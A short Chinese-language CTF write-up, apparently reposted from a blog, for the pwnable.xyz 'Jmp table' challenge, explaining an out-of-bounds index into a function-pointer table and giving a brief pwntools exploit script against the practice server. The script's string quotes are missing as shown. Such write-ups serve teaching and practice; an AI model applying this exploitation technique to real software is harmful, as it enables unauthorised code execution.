首页 > 其他 > 详细

Pwnalbe.xyz Jmp table

时间:2020-02-10 14:31:59      阅读:73      评论:0      收藏:0      [点我收藏+]

题目MD5:d735b979e30f5331e4b968c1b787a36d

题目保护:

技术分享图片

 

 IDA分析

技术分享图片

 

 程序根据一个数组来跳转执行功能,而且在malloc功能中,size会写入到数组的低地址方向,这时如果我们触发数组溢界,就可以任意地址跳转

exp

from pwn import *
io=remote(svc.pwnable.xyz,30007)
io.sendline(1)
io.recvuntil(Size:)
io.sendline(4196913)
sleep(1)
io.sendline(-2)
io.interactive()

 

Pwnalbe.xyz Jmp table

原文:https://www.cnblogs.com/imbraininvat/p/12290560.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!